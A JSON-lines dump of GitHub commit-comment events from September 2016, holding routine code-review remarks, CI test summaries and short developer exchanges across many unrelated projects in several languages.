{"id":"4523014931","type":"CommitCommentEvent","actor":{"login":"Georgiel"},"repo":{"name":"Georgiel/TrainingApp"},"payload":{"comment":{"id":18916061,"position":8,"line":8,"path":"TrainingApp/grails-app/domain/uk/ac/shu/webarch/trainingapp/Sessionexercise.groovy","commit_id":"6e8df2616b18e55a374b3aaf8fdfae5a2aba2cdd","created_at":"2016-09-06T18:22:35Z","updated_at":"2016-09-06T18:22:35Z","body":"Just realised this should have been camel case like the rest, oh well, it didn't seem to break anything."}},"created_at":"2016-09-06T18:22:35Z"}
{"id":"4523017416","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18916067,"position":null,"line":null,"path":null,"commit_id":"8835ddf39694260c2234c0ca4b3c54e705aa44ff","created_at":"2016-09-06T18:23:02Z","updated_at":"2016-09-06T18:23:02Z","body":"@boxa ... you need to remove them all :)\r\nThis what happens... when someone adds sniffed stuff not knowing about area and npcs... \r\nhttps://www.youtube.com/watch?v=IhqW0IHr0ZM    -- first few mins of this one will give you proof ;)\r\n"}},"created_at":"2016-09-06T18:23:02Z"}
{"id":"4523019334","type":"CommitCommentEvent","actor":{"login":"tokenrove"},"repo":{"name":"tokenrove/extrospect-beam"},"payload":{"comment":{"id":18916070,"position":43,"line":43,"path":"README.md","commit_id":"d6bc829bccd5768e99e58119f424b83559cda240","created_at":"2016-09-06T18:23:23Z","updated_at":"2016-09-06T18:23:23Z","body":"Thanks; will update the README."}},"created_at":"2016-09-06T18:23:23Z"}
{"id":"4523020853","type":"CommitCommentEvent","actor":{"login":"supertopher"},"repo":{"name":"pivotal-cloudops/secrets-sanitizer"},"payload":{"comment":{"id":18916072,"position":null,"line":null,"path":null,"commit_id":"f91c0667335703174b2117ca90a92bd3c9db065e","created_at":"2016-09-06T18:23:40Z","updated_at":"2016-09-06T18:23:40Z","body":"we are so proud of ourselves and catbug for this commit.  5 simple lines, but hours of research (all of catbug's holiday weekend) were needed to get those 5 lines.  \r\n\r\nthank you catbug\r\n\r\n![](http://vignette2.wikia.nocookie.net/bravestwarriors/images/2/2f/CatbugShameCone.jpg/revision/latest?cb=20140312153442)"}},"created_at":"2016-09-06T18:23:40Z"}
{"id":"4523024699","type":"CommitCommentEvent","actor":{"login":"TheVirtualMachine"},"repo":{"name":"TheVirtualMachine/MackenzieTechTeam"},"payload":{"comment":{"id":18916074,"position":null,"line":null,"path":null,"commit_id":"ce5e4eba980267ba160c11f2028e0d850e488d2f","created_at":"2016-09-06T18:24:23Z","updated_at":"2016-09-06T18:24:23Z","body":"Also made minor colour changes."}},"created_at":"2016-09-06T18:24:23Z"}
{"id":"4523027977","type":"CommitCommentEvent","actor":{"login":"kajzersoze"},"repo":{"name":"haecker-felix/gradio"},"payload":{"comment":{"id":18916078,"position":null,"line":null,"path":null,"commit_id":"304761ca07a1df027ece18c3e51d79d06f4141ec","created_at":"2016-09-06T18:25:01Z","updated_at":"2016-09-06T18:25:01Z","body":"Cool, also maybe it would be a good idea to download icons and save them on disk, for stations that are in the Library,  then load them  on startup, instead of downloading and scaling them every time from the internet.\r\nI'm not sure, up to you.\r\n"}},"created_at":"2016-09-06T18:25:01Z"}
{"id":"4523034100","type":"CommitCommentEvent","actor":{"login":"lefevre00"},"repo":{"name":"lefevre00/parking"},"payload":{"comment":{"id":18916093,"position":null,"line":null,"path":null,"commit_id":"ea46f05d441046a4597e4d87b4f9ad147aed84de","created_at":"2016-09-06T18:26:06Z","updated_at":"2016-09-06T18:26:06Z","body":"Je pense qu'il faut déplacer cette gestion d'exception dans le bon sender.\r\n\r\nMailService est commun à toutes les plateforme.\r\n\r\nSi tu deploi en standalone prod, le sender serait basé Javax.mail.\r\nSi tu deploi en standalone developpeur, le sender serait basé console.\r\nSi tu deploi sur heroku, le sender serait basé SendGrid.\r\n\r\nLe service ne doit pas avoir a gérer de NaminException.\r\n"}},"created_at":"2016-09-06T18:26:06Z"}
{"id":"4523037322","type":"CommitCommentEvent","actor":{"login":"lefevre00"},"repo":{"name":"lefevre00/parking"},"payload":{"comment":{"id":18916102,"position":15,"line":19,"path":"src/main/java/org/friends/app/service/impl/MailServiceBean.java","commit_id":"ea46f05d441046a4597e4d87b4f9ad147aed84de","created_at":"2016-09-06T18:26:39Z","updated_at":"2016-09-06T18:26:39Z","body":"Il est pourri. Utiliser celui de Spring."}},"created_at":"2016-09-06T18:26:39Z"}
{"id":"4523045591","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18916121,"position":3,"line":3,"path":"otrv4.txt","commit_id":"661ff8897438ee22c9f39256ed615b1f3a32574b","created_at":"2016-09-06T18:28:12Z","updated_at":"2016-09-06T18:28:12Z","body":"Is there a standard definition for OTR? If there is and we are happy with it, maybe we can use that, to not re-define it?"}},"created_at":"2016-09-06T18:28:12Z"}
{"id":"4523048274","type":"CommitCommentEvent","actor":{"login":"doxygen"},"repo":{"name":"doxygen/doxygen"},"payload":{"comment":{"id":18916133,"position":null,"line":null,"path":null,"commit_id":"10256be351f8f00ba5986750a08df1108bf6a4f7","created_at":"2016-09-06T18:28:40Z","updated_at":"2016-09-06T18:28:40Z","body":"Please open a pull request, but beware that most files in vhdlparser are generated by javacc so they will be lost each time the generator is rerun! See the regenerate rule in the Makefile for details and change the source file (vhdlparser.jj)."}},"created_at":"2016-09-06T18:28:40Z"}
{"id":"4523049873","type":"CommitCommentEvent","actor":{"login":"Sparen"},"repo":{"name":"Sparen/Summer2016_Network"},"payload":{"comment":{"id":18916139,"position":null,"line":null,"path":null,"commit_id":"da4466fdf5054ade98d33b5c17e15a4f2d7d996a","created_at":"2016-09-06T18:28:57Z","updated_at":"2016-09-06T18:28:57Z","body":"Please resolve in Phase 3"}},"created_at":"2016-09-06T18:28:57Z"}
{"id":"4523050402","type":"CommitCommentEvent","actor":{"login":"mrdavidlaing"},"repo":{"name":"pivotal-cloudops/secrets-sanitizer"},"payload":{"comment":{"id":18916141,"position":null,"line":null,"path":null,"commit_id":"f91c0667335703174b2117ca90a92bd3c9db065e","created_at":"2016-09-06T18:29:03Z","updated_at":"2016-09-06T18:29:03Z","body":"Yay!  Thank you @supertopher & CatBug.\r\n\r\n<img src=\"http://static.tumblr.com/olzuuii/0Mkl8bh3w/makka_pakka.jpg\"/>"}},"created_at":"2016-09-06T18:29:03Z"}
{"id":"4523050700","type":"CommitCommentEvent","actor":{"login":"beck"},"repo":{"name":"kgardas/openbsd-src"},"payload":{"comment":{"id":18916143,"position":null,"line":null,"path":null,"commit_id":"e717de263adbeeba34723e6b21cf31b4237aa254","created_at":"2016-09-06T18:29:08Z","updated_at":"2016-09-06T18:29:08Z","body":"Ahh, @bob-beck\r\n\r\nNo worries, I'll just unsubscribe."}},"created_at":"2016-09-06T18:29:08Z"}
{"id":"4523058075","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18916159,"position":7,"line":7,"path":"otrv4.txt","commit_id":"661ff8897438ee22c9f39256ed615b1f3a32574b","created_at":"2016-09-06T18:30:28Z","updated_at":"2016-09-06T18:30:28Z","body":"Maybe we can have a separate section with which security properties OTRv4 does and doesn't provide?"}},"created_at":"2016-09-06T18:30:28Z"}
{"id":"4523063771","type":"CommitCommentEvent","actor":{"login":"vks"},"repo":{"name":"boxtown/statrs"},"payload":{"comment":{"id":18916171,"position":19,"line":479,"path":"src/statistics.rs","commit_id":"713595484f1186deb7c914142926ccc8595701a4","created_at":"2016-09-06T18:31:28Z","updated_at":"2016-09-06T18:31:28Z","body":"Why not use `vec![0.0; n]`?"}},"created_at":"2016-09-06T18:31:28Z"}
{"id":"4523068416","type":"CommitCommentEvent","actor":{"login":"tejaskotecha"},"repo":{"name":"moriony/silex-sentry-provider"},"payload":{"comment":{"id":18916179,"position":null,"line":null,"path":null,"commit_id":"da74b10e2dd6e5628250f08563a20b55cee04197","created_at":"2016-09-06T18:32:19Z","updated_at":"2016-09-06T18:32:19Z","body":"@moriony Can you operate with lower version of Pimple? Silex 1.3 is having a collision with pimple version. "}},"created_at":"2016-09-06T18:32:19Z"}
{"id":"4523071345","type":"CommitCommentEvent","actor":{"login":"dongluochen"},"repo":{"name":"aaronlehmann/swarmkit"},"payload":{"comment":{"id":18916185,"position":43,"line":43,"path":"manager/scheduler/decision_tree.go","commit_id":"db2c93cf12271e55abd4e38a4b526551487a4621","created_at":"2016-09-06T18:32:50Z","updated_at":"2016-09-06T18:32:50Z","body":"I think checking every node overkill for services with very few number of instances. We can find some good nodes, but not necessary optimal. "}},"created_at":"2016-09-06T18:32:50Z"}
{"id":"4523071855","type":"CommitCommentEvent","actor":{"login":"marta-"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18916187,"position":15,"line":171,"path":"components/family-studies/ui/src/main/resources/PhenoTips/FamilyClass.xml","commit_id":"0a3dd497dee1ca29e057452bab754df64ea9215a","created_at":"2016-09-06T18:32:56Z","updated_at":"2016-09-06T18:32:56Z","body":"@veronikaslc: We want to be able to display this in the families table with a link, and for that to work this field actually needs to be of `com.xpn.xwiki.objects.classes.PageClass` instead of `StringClass`, storing the proband's document reference. Also, this field should have a custom display ensuring that it is readonly (no input displayed in edit mode) and the label is relatively user friendly (e.g. display patient name if available, patient external id if available, etc). See [how the `reference` field was changed in `FamilyReferenceClass`](https://github.com/phenotips/phenotips/blob/PT-1548/components/family-studies/ui/src/main/resources/PhenoTips/FamilyReferenceClass.xml#L50)."}},"created_at":"2016-09-06T18:32:56Z"}
{"id":"4523072222","type":"CommitCommentEvent","actor":{"login":"mamehaze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18916189,"position":null,"line":null,"path":null,"commit_id":"cde1fe2633c245132c9e572853e821880dd2be92","created_at":"2016-09-06T18:33:01Z","updated_at":"2016-09-06T18:33:01Z","body":"are you sure?\r\n\r\n11beat, even on an -aviwrite recording looks to be running at a lot less than full speed"}},"created_at":"2016-09-06T18:33:01Z"}
{"id":"4523073043","type":"CommitCommentEvent","actor":{"login":"vincentstorme"},"repo":{"name":"hnlee/kata"},"payload":{"comment":{"id":18916191,"position":13,"line":5,"path":"bowlinggame/v01/bowling/src/bowling/core.clj","commit_id":"c8738c8fe02f8b080830148e1b52a3df14ed175d","created_at":"2016-09-06T18:33:11Z","updated_at":"2016-09-06T18:33:11Z","body":"Would it be possible to add a docstring to this function to explain why there is an arity?"}},"created_at":"2016-09-06T18:33:11Z"}
{"id":"4523081361","type":"CommitCommentEvent","actor":{"login":"boxtown"},"repo":{"name":"boxtown/statrs"},"payload":{"comment":{"id":18916208,"position":19,"line":479,"path":"src/statistics.rs","commit_id":"713595484f1186deb7c914142926ccc8595701a4","created_at":"2016-09-06T18:34:41Z","updated_at":"2016-09-06T18:34:41Z","body":"@vks Was in kind of a rush to get ranks in yesterday, wasn't thinking about it. Will modify this later today. Thanks for helping out!"}},"created_at":"2016-09-06T18:34:41Z"}
{"id":"4523082738","type":"CommitCommentEvent","actor":{"login":"jx5c"},"repo":{"name":"jx5c/HASE2017"},"payload":{"comment":{"id":18916210,"position":null,"line":null,"path":null,"commit_id":"5192df040d63b0c941cf250e283f35bbbfb7292e","created_at":"2016-09-06T18:34:56Z","updated_at":"2016-09-06T18:34:56Z","body":"1. including important data of the case study\r\n2. Related work, conclusion, references are not included"}},"created_at":"2016-09-06T18:34:56Z"}
{"id":"4523082939","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"progsky/RoR"},"payload":{"comment":{"id":18916211,"position":17,"line":17,"path":"proj3/route.rb","commit_id":"9926881da8e3290bcc0d1c7d93b3a329b838b407","created_at":"2016-09-06T18:34:58Z","updated_at":"2016-09-06T18:34:58Z","body":"А зачем переменная index? Внутри блока each_with_index используется другая переменная, хоть и с тем же именем."}},"created_at":"2016-09-06T18:34:58Z"}
{"id":"4523084734","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18916217,"position":null,"line":null,"path":null,"commit_id":"e3e4c86fae8c77afdb68c3f489c00c336202fa91","created_at":"2016-09-06T18:35:18Z","updated_at":"2016-09-06T18:35:18Z","body":"+💯 !"}},"created_at":"2016-09-06T18:35:18Z"}
{"id":"4523085342","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18916218,"position":242,"line":927,"path":"app/src/main/java/com/kamron/pogoiv/Pokefly.java","commit_id":"e3e4c86fae8c77afdb68c3f489c00c336202fa91","created_at":"2016-09-06T18:35:24Z","updated_at":"2016-09-06T18:35:24Z","body":"Does `deleteScreenshotIfIShould` sound better?"}},"created_at":"2016-09-06T18:35:24Z"}
{"id":"4523087382","type":"CommitCommentEvent","actor":{"login":"z64"},"repo":{"name":"LeggoMyEcho/DrawBot"},"payload":{"comment":{"id":18916227,"position":1,"line":1,"path":"lib/modules/commands/actions.rb","commit_id":"322ed8ad98b2f056a6a54f7a3734ff9b04e1f7b5","created_at":"2016-09-06T18:35:46Z","updated_at":"2016-09-06T18:35:46Z","body":"Be careful about adding errant spaces like these."}},"created_at":"2016-09-06T18:35:46Z"}
{"id":"4523088983","type":"CommitCommentEvent","actor":{"login":"z64"},"repo":{"name":"LeggoMyEcho/DrawBot"},"payload":{"comment":{"id":18916230,"position":14,"line":17,"path":"lib/modules/commands/actions.rb","commit_id":"322ed8ad98b2f056a6a54f7a3734ff9b04e1f7b5","created_at":"2016-09-06T18:36:03Z","updated_at":"2016-09-06T18:36:03Z","body":"Same here"}},"created_at":"2016-09-06T18:36:03Z"}
{"id":"4523089782","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18916231,"position":221,"line":906,"path":"app/src/main/java/com/kamron/pogoiv/Pokefly.java","commit_id":"e3e4c86fae8c77afdb68c3f489c00c336202fa91","created_at":"2016-09-06T18:36:12Z","updated_at":"2016-09-06T18:36:12Z","body":"`readPickedPokemon`?"}},"created_at":"2016-09-06T18:36:12Z"}
{"id":"4523090073","type":"CommitCommentEvent","actor":{"login":"dongluochen"},"repo":{"name":"aaronlehmann/swarmkit"},"payload":{"comment":{"id":18916233,"position":53,"line":53,"path":"manager/scheduler/decision_tree.go","commit_id":"db2c93cf12271e55abd4e38a4b526551487a4621","created_at":"2016-09-06T18:36:15Z","updated_at":"2016-09-06T18:36:15Z","body":"It'd be shorter like this: \r\n\r\n```\r\n        if len(nodes) > n {\r\n         \tquickselect.QuickSelect(nodeSorter{nodes: nodes, lessFunc: nodeLess}, n)\r\n        \tnodes = nodes[:n]\r\n\t}\r\n\r\n\tsort.Sort(nodeSorter{nodes: nodes, lessFunc: nodeLess})\r\n\treturn nodes\r\n```"}},"created_at":"2016-09-06T18:36:15Z"}
{"id":"4523090325","type":"CommitCommentEvent","actor":{"login":"athei"},"repo":{"name":"Mieze/AtherosE2200Ethernet"},"payload":{"comment":{"id":18916234,"position":null,"line":null,"path":null,"commit_id":"abb10d2326762cb26d789079c4db1899e173fc2d","created_at":"2016-09-06T18:36:18Z","updated_at":"2016-09-06T18:36:18Z","body":"Kext need to have specific owner and permission as the quoted text states. The easiest way to fix that is to copy the kext as root.\r\n`sudo cp -R AtherosE2200Ethernet.kext /Library/Extensions/`\r\n\r\nPlease note that you don't add a slash behind the source because it would copy the contents of the kext (remember it is just a directory) in that case.\r\n"}},"created_at":"2016-09-06T18:36:18Z"}
{"id":"4523091349","type":"CommitCommentEvent","actor":{"login":"stcheng"},"repo":{"name":"Azure/sonic-buildimage"},"payload":{"comment":{"id":18916235,"position":null,"line":null,"path":null,"commit_id":"d5d7168f10da33b8e329f3597d98a8a873926614","created_at":"2016-09-06T18:36:27Z","updated_at":"2016-09-06T18:36:27Z","body":"@garyachy The docker-bgp is not needed. Quagga is part of the docker-fpm, and this container also contains the fpmsyncd application in it."}},"created_at":"2016-09-06T18:36:27Z"}
{"id":"4523091464","type":"CommitCommentEvent","actor":{"login":"z64"},"repo":{"name":"LeggoMyEcho/DrawBot"},"payload":{"comment":{"id":18916236,"position":70,"line":126,"path":"lib/modules/commands/actions.rb","commit_id":"322ed8ad98b2f056a6a54f7a3734ff9b04e1f7b5","created_at":"2016-09-06T18:36:29Z","updated_at":"2016-09-06T18:36:29Z","body":"Don't remove the newline at the end."}},"created_at":"2016-09-06T18:36:29Z"}
{"id":"4523093534","type":"CommitCommentEvent","actor":{"login":"cThePush"},"repo":{"name":"GameModsBR/MineCity"},"payload":{"comment":{"id":18916239,"position":null,"line":null,"path":null,"commit_id":"22ad48a0ad487ebcab243b8f2e9f3e8b62b06648","created_at":"2016-09-06T18:36:50Z","updated_at":"2016-09-06T18:36:50Z","body":"José estou sem tempo mas consegui fazer a parte de ler o ficheiro de configuração de permissões mas ainda tenho que da uma refinada mas estou sem tempo porque no meu trabalho estou com um projecto que esta quase no fim e tenho que entregar. Assim que tiver tempo falamos melhor."}},"created_at":"2016-09-06T18:36:50Z"}
{"id":"4523095462","type":"CommitCommentEvent","actor":{"login":"z64"},"repo":{"name":"LeggoMyEcho/DrawBot"},"payload":{"comment":{"id":18916244,"position":29,"line":86,"path":"lib/modules/commands/actions.rb","commit_id":"322ed8ad98b2f056a6a54f7a3734ff9b04e1f7b5","created_at":"2016-09-06T18:37:11Z","updated_at":"2016-09-06T18:37:11Z","body":"Indentation needs to be fixed, see how the other commands line up"}},"created_at":"2016-09-06T18:37:11Z"}
{"id":"4523096531","type":"CommitCommentEvent","actor":{"login":"z64"},"repo":{"name":"LeggoMyEcho/DrawBot"},"payload":{"comment":{"id":18916245,"position":38,"line":95,"path":"lib/modules/commands/actions.rb","commit_id":"322ed8ad98b2f056a6a54f7a3734ff9b04e1f7b5","created_at":"2016-09-06T18:37:22Z","updated_at":"2016-09-06T18:37:22Z","body":"Same as above"}},"created_at":"2016-09-06T18:37:22Z"}
{"id":"4523096935","type":"CommitCommentEvent","actor":{"login":"z64"},"repo":{"name":"LeggoMyEcho/DrawBot"},"payload":{"comment":{"id":18916246,"position":47,"line":104,"path":"lib/modules/commands/actions.rb","commit_id":"322ed8ad98b2f056a6a54f7a3734ff9b04e1f7b5","created_at":"2016-09-06T18:37:26Z","updated_at":"2016-09-06T18:37:26Z","body":"Same as above"}},"created_at":"2016-09-06T18:37:26Z"}
{"id":"4523098244","type":"CommitCommentEvent","actor":{"login":"z64"},"repo":{"name":"LeggoMyEcho/DrawBot"},"payload":{"comment":{"id":18916249,"position":43,"line":100,"path":"lib/modules/commands/actions.rb","commit_id":"322ed8ad98b2f056a6a54f7a3734ff9b04e1f7b5","created_at":"2016-09-06T18:37:40Z","updated_at":"2016-09-06T18:37:40Z","body":"Should be `usage:` not `:usage`"}},"created_at":"2016-09-06T18:37:40Z"}
{"id":"4523100460","type":"CommitCommentEvent","actor":{"login":"z64"},"repo":{"name":"LeggoMyEcho/DrawBot"},"payload":{"comment":{"id":18916258,"position":52,"line":109,"path":"lib/modules/commands/actions.rb","commit_id":"322ed8ad98b2f056a6a54f7a3734ff9b04e1f7b5","created_at":"2016-09-06T18:38:06Z","updated_at":"2016-09-06T18:38:06Z","body":"Should be `usage:` not `:usage`"}},"created_at":"2016-09-06T18:38:06Z"}
{"id":"4523104438","type":"CommitCommentEvent","actor":{"login":"z64"},"repo":{"name":"LeggoMyEcho/DrawBot"},"payload":{"comment":{"id":18916266,"position":55,"line":112,"path":"lib/modules/commands/actions.rb","commit_id":"322ed8ad98b2f056a6a54f7a3734ff9b04e1f7b5","created_at":"2016-09-06T18:38:46Z","updated_at":"2016-09-06T18:38:46Z","body":"Indentation needs to be fixed, see how the other commands line up\r\n"}},"created_at":"2016-09-06T18:38:46Z"}
{"id":"4523107163","type":"CommitCommentEvent","actor":{"login":"z64"},"repo":{"name":"LeggoMyEcho/DrawBot"},"payload":{"comment":{"id":18916276,"position":34,"line":91,"path":"lib/modules/commands/actions.rb","commit_id":"322ed8ad98b2f056a6a54f7a3734ff9b04e1f7b5","created_at":"2016-09-06T18:39:14Z","updated_at":"2016-09-06T18:39:14Z","body":"Should be `description:` and `usage:` "}},"created_at":"2016-09-06T18:39:14Z"}
{"id":"4523109501","type":"CommitCommentEvent","actor":{"login":"wengyujia"},"repo":{"name":"wengyujia/LuckyPanDemo"},"payload":{"comment":{"id":18916279,"position":null,"line":null,"path":null,"commit_id":"65b41d5182f7f614aa902ace9417cd2d26cd073f","created_at":"2016-09-06T18:39:38Z","updated_at":"2016-09-06T18:39:38Z","body":"s"}},"created_at":"2016-09-06T18:39:38Z"}
{"id":"4523111156","type":"CommitCommentEvent","actor":{"login":"wengyujia"},"repo":{"name":"wengyujia/LuckyPanDemo"},"payload":{"comment":{"id":18916285,"position":4,"line":4,"path":"README.md","commit_id":"65b41d5182f7f614aa902ace9417cd2d26cd073f","created_at":"2016-09-06T18:39:57Z","updated_at":"2016-09-06T18:39:57Z","body":"f "}},"created_at":"2016-09-06T18:39:57Z"}
{"id":"4523114024","type":"CommitCommentEvent","actor":{"login":"Jeff-Lewis"},"repo":{"name":"Jeff-Lewis/cls-bluebird-jl"},"payload":{"comment":{"id":18916289,"position":null,"line":null,"path":null,"commit_id":"f04e9e4fe83ca50a31e374cc45df1f4db96976f3","created_at":"2016-09-06T18:40:27Z","updated_at":"2016-09-06T18:40:27Z","body":"It was causing issues on Windows I thought. I'll check it again."}},"created_at":"2016-09-06T18:40:27Z"}
{"id":"4523114651","type":"CommitCommentEvent","actor":{"login":"vutran"},"repo":{"name":"vutran/dext"},"payload":{"comment":{"id":18916290,"position":30,"line":71,"path":"app/renderer/src/containers/ResultListContainer.js","commit_id":"2a6c9d2a24ca240671a7de5f4b5c322023f14396","created_at":"2016-09-06T18:40:34Z","updated_at":"2016-09-06T18:40:34Z","body":"Yeah, it's kind of tricky.\r\n\r\n`this.c` refers to the `<ResultList />` and inside of `<ResultList />`, there's another `c` ref prop which is the actual `<ol />` element we want to modify."}},"created_at":"2016-09-06T18:40:34Z"}
{"id":"4523118961","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18916294,"position":null,"line":null,"path":null,"commit_id":"95ddbbe3fcde87eb2285a3afbacd95be1ba51058","created_at":"2016-09-06T18:41:19Z","updated_at":"2016-09-06T18:41:19Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2365 of 2368 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T18:41:19Z"}
{"id":"4523119615","type":"CommitCommentEvent","actor":{"login":"wengyujia"},"repo":{"name":"wengyujia/LuckyPanDemo"},"payload":{"comment":{"id":18916298,"position":null,"line":null,"path":null,"commit_id":"65b41d5182f7f614aa902ace9417cd2d26cd073f","created_at":"2016-09-06T18:41:26Z","updated_at":"2016-09-06T18:41:26Z","body":"ff"}},"created_at":"2016-09-06T18:41:26Z"}
{"id":"4523121550","type":"CommitCommentEvent","actor":{"login":"jlemoo"},"repo":{"name":"jlemoo/SharePoint-Functions"},"payload":{"comment":{"id":18916306,"position":null,"line":null,"path":null,"commit_id":"2702a5ba58fe475ff68640a00b46a2ef948958cb","created_at":"2016-09-06T18:41:44Z","updated_at":"2016-09-06T18:41:44Z","body":"The success handler goes to the extra step of ensuring the user on the site. Not generally necessary."}},"created_at":"2016-09-06T18:41:44Z"}
{"id":"4523122333","type":"CommitCommentEvent","actor":{"login":"solkimicreb"},"repo":{"name":"vivekimsit/nx-framework"},"payload":{"comment":{"id":18916312,"position":null,"line":null,"path":null,"commit_id":"c0812965a1c817710e0388cefe4706f9ed186171","created_at":"2016-09-06T18:41:53Z","updated_at":"2016-09-06T18:41:53Z","body":"Maybe we could generalize this a bit more. \r\nThe [attribute middleware](https://github.com/RisingStack/nx-framework/blob/master/middlewares/attributes.js) replaces `@attribute=\"expression\"` with `attribute=\"result of expression\"` by default if no handler is specified. See the `processAttributesWithoutHandler()` function for this. This means that without your extra code `@disabled=\"greeting\"` would do something similar than with your code. It would set the value of `disabled` to 'true', 'false' or something else.\r\n\r\nI thought that if the expression evaluates to a falsy value (empty string, false, undefined) we could call `elem.removeAttribute(attr)` instead of calling `elem.setAttribute(attr, newValue)` in the attributes middleware. This would be a few lines of code and would solve the issue with all attributes that are toggleable by being present or not (rather than having a falsy value or not).\r\n\r\nWhat do you think?\r\n\r\nSide note: Your code is perfectly in style with the rest, I am really happy with it in general (:"}},"created_at":"2016-09-06T18:41:53Z"}
{"id":"4523123331","type":"CommitCommentEvent","actor":{"login":"BobDickinson"},"repo":{"name":"SynchroLabs/SynchroServer"},"payload":{"comment":{"id":18916314,"position":22,"line":606,"path":"SynchroServer/node_modules/synchro-web/client/core/json.js","commit_id":"082a5ba4c1910010986b2f5dca257f14572dc7e8","created_at":"2016-09-06T18:42:04Z","updated_at":"2016-09-06T18:42:04Z","body":"Checked in my various workarounds and layout tweaks.  I think Android is\nlooking good except for the \"Refresh\" actionBar item.\n\nOn Mon, Sep 5, 2016 at 7:09 PM, Blake Ramsdell <notifications@github.com>\nwrote:\n\n> You may not need the special case for null:\n>\n> > JSON.stringify(null)\n> 'null'\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/SynchroLabs/SynchroServer/commit/082a5ba4c1910010986b2f5dca257f14572dc7e8#commitcomment-18904870>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AADJgazLz3esZwP4K4jGzP1x0TRY0ivqks5qnMt1gaJpZM4J1Zvz>\n> .\n>\n"}},"created_at":"2016-09-06T18:42:04Z"}
{"id":"4523123690","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18916317,"position":null,"line":null,"path":null,"commit_id":"95ddbbe3fcde87eb2285a3afbacd95be1ba51058","created_at":"2016-09-06T18:42:08Z","updated_at":"2016-09-06T18:42:08Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-06T18:42:08Z"}
{"id":"4523123699","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18916318,"position":null,"line":null,"path":null,"commit_id":"f4b430d57611a180193fe8494e2317ab702e2645","created_at":"2016-09-06T18:42:08Z","updated_at":"2016-09-06T18:42:08Z","body":"FixCentroidForNonconvex (JasonGlazer) - Win64-Windows-7-VisualStudio-12: OK (2325 of 2333 tests passed, 25 test warnings)\n\n * 32 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 4 tests had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 8 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T18:42:08Z"}
{"id":"4523134074","type":"CommitCommentEvent","actor":{"login":"Henning-Klatt"},"repo":{"name":"iot-wetterstation/iot_wetterdaten"},"payload":{"comment":{"id":18916339,"position":null,"line":null,"path":null,"commit_id":"180e6b14dcd84f227ffbee6ab4dd2626fe0af2cb","created_at":"2016-09-06T18:44:03Z","updated_at":"2016-09-06T18:44:03Z","body":"Ja, sorry, da muss ein Fehler bei dem Merge aufgetreten sein"}},"created_at":"2016-09-06T18:44:03Z"}
{"id":"4523134800","type":"CommitCommentEvent","actor":{"login":"wengyujia"},"repo":{"name":"wengyujia/LuckyPanDemo"},"payload":{"comment":{"id":18916342,"position":4,"line":4,"path":"README.md","commit_id":"65b41d5182f7f614aa902ace9417cd2d26cd073f","created_at":"2016-09-06T18:44:11Z","updated_at":"2016-09-06T18:44:11Z","body":"cccc"}},"created_at":"2016-09-06T18:44:11Z"}
